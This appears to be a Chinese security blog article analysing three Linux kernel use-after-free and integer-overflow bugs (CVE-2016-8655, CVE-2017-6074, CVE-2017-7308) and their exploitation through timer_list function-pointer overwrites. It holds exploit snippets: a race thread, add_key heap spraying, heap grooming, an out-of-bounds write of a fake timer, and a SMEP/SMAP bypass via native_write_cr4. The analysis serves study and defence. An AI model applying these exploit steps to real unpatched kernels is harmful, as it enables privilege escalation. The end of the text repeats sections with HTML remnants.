Linux内核漏洞利用：timer_list结构体的使用与分析<\/h1>

前言<\/h2>
本文详细分析Linux内核中与网络协议相关的三个漏洞(CVE-2016-8655、CVE-2017-6074和CVE-2017-7308)，这些漏洞的利用都采用了覆盖`timer_list<\/code>结构体中函数指针的方法。我们将深入探讨这些漏洞的原理和利用技术。<\/p>`

timer_list结构体<\/h2>
Linux内核使用timer_list<\/code>结构体作为定时器：<\/p>
struct<\/span> timer_list {
<\/span><\/span>    struct<\/span> hlist_node entry;       \/\/ 定时器链表的入口
<\/span><\/span><\/span><\/span>    unsigned<\/span> long<\/span> expires;         \/\/ 定时器到期时间
<\/span><\/span><\/span><\/span>    void<\/span> (*<\/span>function)(unsigned<\/span> long<\/span>); \/\/ 定时器处理函数
<\/span><\/span><\/span><\/span>    unsigned<\/span> long<\/span> data;            \/\/ 传给定时器处理函数的参数
<\/span><\/span><\/span><\/span>    u32 flags;
<\/span><\/span>    int<\/span> slack;
<\/span><\/span>#ifdef CONFIG_TIMER_STATS
<\/span><\/span><\/span><\/span>    int<\/span> start_pid;
<\/span><\/span>    void<\/span> *<\/span>start_site;
<\/span><\/span>    char<\/span> start_comm[16<\/span>];
<\/span><\/span>#endif
<\/span><\/span><\/span>#ifdef CONFIG_LOCKDEP
<\/span><\/span><\/span><\/span>    struct<\/span> lockdep_map lockdep_map;
<\/span><\/span>#endif
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>关键成员：<\/p>

entry<\/code>: 定时器链表的入口<\/li>
expires<\/code>: 定时器到期时间<\/li>
function<\/code>: 定时器处理函数，到期时执行<\/li>
data<\/code>: 传递给处理函数的参数<\/li>
<\/ul>
内核调试方法<\/h2>
常用的内核调试方法：<\/p>

自己编译内核使用qemu+busybox调试<\/li>
使用virtualbox\/vmware搭建两台虚拟机用串口通信调试<\/li>
使用vmware提供的gdb stub调试（需要物理机也是Linux系统）<\/li>
<\/ol>
CVE-2016-8655分析<\/h2>
漏洞原理<\/h3>
packet_set_ring<\/code>函数在创建ringbuffer时，如果packet版本为TPACKET_V3会初始化定时器：<\/p>
case<\/span> TPACKET_V3:
<\/span><\/span>    if<\/span> (!<\/span>tx_ring)
<\/span><\/span>        init_prb_bdqc(po, rb, pg_vec, req_u);
<\/span><\/span>    break<\/span>;
<\/span><\/span><\/code><\/pre>调用链：packet_set_ring()<\/code> → init_prb_bdqc()<\/code> → prb_setup_retire_blk_timer()<\/code> → prb_init_blk_timer()<\/code> → init_timer()<\/code><\/p>
关闭socket时会再次调用packet_set_ring<\/code>函数，如果packet版本大于TPACKET_V2，内核会注销定时器：<\/p>
if<\/span> (closing &&<\/span> (po-><\/span>tp_version ><\/span> TPACKET_V2)) {
<\/span><\/span>    if<\/span> (!<\/span>tx_ring)
<\/span><\/span>        prb_shutdown_retire_blk_timer(po, rb_queue);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>调用链：packet_set_ring()<\/code> → prb_shutdown_retire_blk_timer()<\/code> → prb_del_retire_blk_timer()<\/code> → del_timer_sync()<\/code> → del_timer()<\/code><\/p>
漏洞点<\/strong>：如果在这段时间内其他线程调用setsockopt<\/code>将packet设为TPACKET_V1，前面初始化的定时器不会被注销，导致UAF。<\/p>
漏洞利用<\/h3>

触发UAF<\/strong>：通过线程竞争设置TPACKET_V1和TPACKET_V3版本<\/li>
<\/ol>
void<\/span> *<\/span>vers_switcher<\/span>(void<\/span> *<\/span>arg) {
<\/span><\/span>    int<\/span> val, x, y;
<\/span><\/span>    while<\/span> (barrier) {}
<\/span><\/span>    while<\/span> (1<\/span>) {
<\/span><\/span>        val =<\/span> TPACKET_V1;
<\/span><\/span>        x =<\/span> setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &<\/span>val, sizeof<\/span>(val));
<\/span><\/span>        y++<\/span>;
<\/span><\/span>        if<\/span> (x !=<\/span> 0<\/span>) break<\/span>;
<\/span><\/span>        
<\/span><\/span>        val =<\/span> TPACKET_V3;
<\/span><\/span>        x =<\/span> setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &<\/span>val, sizeof<\/span>(val));
<\/span><\/span>        if<\/span> (x !=<\/span> 0<\/span>) break<\/span>;
<\/span><\/span>        y++<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> NULL;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
堆喷射<\/strong>：使用add_key<\/code>函数覆盖timer_list结构体<\/li>
<\/ol>
#define BUFSIZE 1408
<\/span><\/span><\/span><\/span>char<\/span> exploitbuf[BUFSIZE];
<\/span><\/span>
<\/span><\/span>void<\/span> kmalloc<\/span>(void<\/span>) {
<\/span><\/span>    while<\/span> (1<\/span>)
<\/span><\/span>        syscall(__NR_add_key, "user"<\/span>, "wtf"<\/span>, exploitbuf, BUFSIZE-<\/span>24<\/span>, -<\/span>2<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>user_key_payload<\/code>结构体：<\/p>
struct<\/span> user_key_payload {
<\/span><\/span>    struct<\/span> rcu_head rcu;
<\/span><\/span>    unsigned<\/span> short<\/span> datalen;  \/\/ 0x10
<\/span><\/span><\/span><\/span>    char<\/span> data[0<\/span>];           \/\/ 0x12
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>
利用过程<\/strong>：

第一次触发：调用set_memory_rw<\/code>将vsyscall页设置为可写<\/li>
修改vsyscall页内容为构造的ctl_table<\/code>结构体数据<\/li>
第二次触发：调用register_sysctl_table<\/code>注册构造的ctl_table<\/code><\/li>
修改\/proc\/sys\/hack<\/code>为当前程序路径<\/li>
调用socket触发modprobe_path<\/code>执行<\/li>
<\/ul>
<\/li>
<\/ol>
CVE-2017-6074分析<\/h2>
漏洞原理<\/h3>
在dccp_rcv_state_process<\/code>函数中，如果dccp_v6_conn_request<\/code>成功返回会强制释放skb：<\/p>
if<\/span> (sk-><\/span>sk_state ==<\/span> DCCP_LISTEN) {
<\/span><\/span>    if<\/span> (dh-><\/span>dccph_type ==<\/span> DCCP_PKT_REQUEST) {
<\/span><\/span>        if<\/span> (inet_csk(sk)-><\/span>icsk_af_ops-><\/span>conn_request(sk, skb) <<\/span> 0<\/span>)
<\/span><\/span>            return<\/span> 1<\/span>;
<\/span><\/span>        goto<\/span> discard;
<\/span><\/span>    }
<\/span><\/span>    ...
<\/span><\/span>discard:
<\/span><\/span>    __kfree_skb(skb);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>但如果socket设置了IPV6_RECVPKTINFO<\/code>，skb会被保存到ireq->pktopts<\/code>且引用计数+1：<\/p>
if<\/span> (ipv6_opt_accepted(sk, skb, IP6CB(skb)) ||<\/span>
<\/span><\/span>    np-><\/span>rxopt.bits.rxinfo ||<\/span> np-><\/span>rxopt.bits.rxoinfo ||<\/span>
<\/span><\/span>    np-><\/span>rxopt.bits.rxhlim ||<\/span> np-><\/span>rxopt.bits.rxohlim) {
<\/span><\/span>    atomic_inc(&<\/span>skb-><\/span>users);
<\/span><\/span>    ireq-><\/span>pktopts =<\/span> skb;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>：dccp_rcv_state_process<\/code>仍然会释放skb，导致UAF。<\/p>
漏洞利用<\/h3>

覆盖timer_list<\/code>结构体中的function<\/code>为native_write_cr4<\/code>禁用SMEP\/SMAP<\/li>
覆盖skb_shared_info<\/code>结构体中的函数指针，在释放skb时执行用户态提权函数<\/li>
<\/ol>
CVE-2017-7308分析<\/h2>
漏洞原理<\/h3>
packet_set_ring<\/code>函数中存在整数溢出：<\/p>
if<\/span> (po-><\/span>tp_version >=<\/span> TPACKET_V3 &&<\/span>
<\/span><\/span>    (int<\/span>)(req-><\/span>tp_block_size -<\/span> BLK_PLUS_PRIV(req_u-><\/span>req3.tp_sizeof_priv)) <=<\/span> 0<\/span>)
<\/span><\/span>    goto<\/span> out;
<\/span><\/span><\/code><\/pre>绕过检查的例子：<\/p>

req->tp_block_size<\/code> = 4096 (0x1000)<\/li>
req_u->req3.tp_sizeof_priv<\/code> = (1 << 31) + 4096 (0x80001000)<\/li>
BLK_PLUS_PRIV(B)<\/code> = (1 << 31) + 4096 + 48 = 0x80001030<\/li>
A - BLK_PLUS_PRIV(B)<\/code> = 0x1000 - 0x80001030 = 0x7fffffd0<\/li>
(int)0x7fffffd0 = 0x7fffffd0 > 0<\/li>
<\/ul>
漏洞利用<\/h3>

堆布局准备<\/strong>：

分配许多2048字节对象填充kmalloc-2048缓存<\/li>
分配许多0x8000字节页面内存块耗尽buddy分配器<\/li>
<\/ul>
<\/li>
<\/ol>
#define KMALLOC_PAD 512
<\/span><\/span><\/span><\/span>kmalloc_pad(KMALLOC_PAD);
<\/span><\/span>
<\/span><\/span>void<\/span> kmalloc_pad<\/span>(int<\/span> count) {
<\/span><\/span>    int<\/span> i;
<\/span><\/span>    for<\/span> (i =<\/span> 0<\/span>; i <<\/span> count; i++<\/span>)
<\/span><\/span>        packet_sock_kmalloc();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
创建环形缓冲区<\/strong>：

创建具有两个0x8000内存块的环形缓冲区<\/li>
第一个内存块会被关闭，第二个会被覆盖<\/li>
<\/ul>
<\/li>
<\/ol>
int<\/span> oob_setup<\/span>(int<\/span> offset) {
<\/span><\/span>    unsigned<\/span> int<\/span> maclen =<\/span> ETH_HDR_LEN;
<\/span><\/span>    unsigned<\/span> int<\/span> netoff =<\/span> TPACKET_ALIGN(TPACKET3_HDRLEN +<\/span> (maclen <<\/span> 16<\/span> ?<\/span> 16<\/span> :<\/span> maclen));
<\/span><\/span>    unsigned<\/span> int<\/span> macoff =<\/span> netoff -<\/span> maclen;
<\/span><\/span>    unsigned<\/span> int<\/span> sizeof_priv =<\/span> (1u<\/span> <<<\/span> 31<\/span>) +<\/span> (1u<\/span> <<<\/span> 30<\/span>) +<\/span> 0x8000<\/span> -<\/span> BLK_HDR_LEN -<\/span> macoff +<\/span> offset;
<\/span><\/span>    return<\/span> packet_socket_setup(0x8000<\/span>, 2048<\/span>, 2<\/span>, sizeof_priv, 100<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
触发漏洞<\/strong>：

覆盖timer_list<\/code>结构体中的函数指针<\/li>
覆盖packet_sock->xmit<\/code>函数指针<\/li>
<\/ul>
<\/li>
<\/ol>
void<\/span> oob_timer_execute<\/span>(void<\/span> *<\/span>func, unsigned<\/span> long<\/span> arg) {
<\/span><\/span>    oob_setup(2048<\/span> +<\/span> TIMER_OFFSET -<\/span> 8<\/span>); \/\/ B78
<\/span><\/span><\/span><\/span>    int<\/span> i;
<\/span><\/span>    for<\/span> (i =<\/span> 0<\/span>; i <<\/span> 32<\/span>; i++<\/span>) {
<\/span><\/span>        int<\/span> timer =<\/span> packet_sock_kmalloc();
<\/span><\/span>        packet_sock_timer_schedule(timer, 1000<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    char<\/span> buffer[2048<\/span>];
<\/span><\/span>    memset(&<\/span>buffer[0<\/span>], 0<\/span>, sizeof<\/span>(buffer));
<\/span><\/span>    struct<\/span> timer_list *<\/span>timer =<\/span> (struct<\/span> timer_list *<\/span>)&<\/span>buffer[8<\/span>];
<\/span><\/span>    timer-><\/span>function =<\/span> func;
<\/span><\/span>    timer-><\/span>data =<\/span> arg;
<\/span><\/span>    timer-><\/span>flags =<\/span> 1<\/span>;
<\/span><\/span>    oob_write(&<\/span>buffer[0<\/span>] +<\/span> 2<\/span>, sizeof<\/span>(*<\/span>timer) +<\/span> 8<\/span> -<\/span> 2<\/span>);
<\/span><\/span>    sleep(1<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>总结<\/h2>
本文分析的三个Linux内核漏洞都利用了覆盖packet_sock<\/code>结构体中的timer_list<\/code>结构体函数指针的方法实现提权。相比常见的stack pivot+ROP链方法，这种方法能同时禁用SMEP和SMAP，具有更好的稳定性。<\/p>
关键点总结<\/h3>

timer_list<\/code>结构体中的function<\/code>指针是关键攻击目标<\/li>
通过UAF漏洞实现对timer_list<\/code>结构体的控制<\/li>
利用堆喷射技术精确覆盖目标结构体<\/li>
通过修改关键函数指针(如native_write_cr4<\/code>)绕过保护机制<\/li>
精心设计堆布局确保漏洞利用的可靠性<\/li>
<\/ol>
参考资料<\/h2>

CVE-2016-8655 EXP<\/a><\/li>
CVE-2017-6074 EXP<\/a><\/li>
CVE-2017-7308 EXP<\/a><\/li>
CVE-2016-8655内核竞争条件漏洞调试分析<\/a><\/li>
Exploiting the Linux kernel via packet sockets<\/a><\/li>
New Reliable Android Kernel Root Exploitation Techniques<\/a><\/li>
<\/ol>

Linux内核漏洞利用：timer_list结构体的使用与分析<\/h1>

前言<\/h2> 本文详细分析Linux内核中与网络协议相关的三个漏洞(CVE-2016-8655、CVE-2017-6074和CVE-2017-7308)，这些漏洞的利用都采用了覆盖timer_list<\/code>结构体中函数指针的方法。我们将深入探讨这些漏洞的原理和利用技术。<\/p>

CVE-2016-8655分析<\/h2>

CVE-2017-6074分析<\/h2>

CVE-2017-7308分析<\/h2>

总结<\/h2> 本文分析的三个Linux内核漏洞都利用了覆盖packet_sock<\/code>结构体中的timer_list<\/code>结构体函数指针的方法实现提权。相比常见的stack pivot+ROP链方法，这种方法能同时禁用SMEP和SMAP，具有更好的稳定性。<\/p>

参考资料<\/h2> CVE-2016-8655 EXP<\/a><\/li> CVE-2017-6074 EXP<\/a><\/li> CVE-2017-7308 EXP<\/a><\/li> CVE-2016-8655内核竞争条件漏洞调试分析<\/a><\/li> Exploiting the Linux kernel via packet sockets<\/a><\/li> New Reliable Android Kernel Root Exploitation Techniques<\/a><\/li> <\/ol>

前言<\/h2>
本文详细分析Linux内核中与网络协议相关的三个漏洞(CVE-2016-8655、CVE-2017-6074和CVE-2017-7308)，这些漏洞的利用都采用了覆盖`timer_list<\/code>结构体中函数指针的方法。我们将深入探讨这些漏洞的原理和利用技术。<\/p>`

总结<\/h2>
本文分析的三个Linux内核漏洞都利用了覆盖`packet_sock<\/code>结构体中的timer_list<\/code>结构体函数指针的方法实现提权。相比常见的stack pivot+ROP链方法，这种方法能同时禁用SMEP和SMAP，具有更好的稳定性。<\/p>`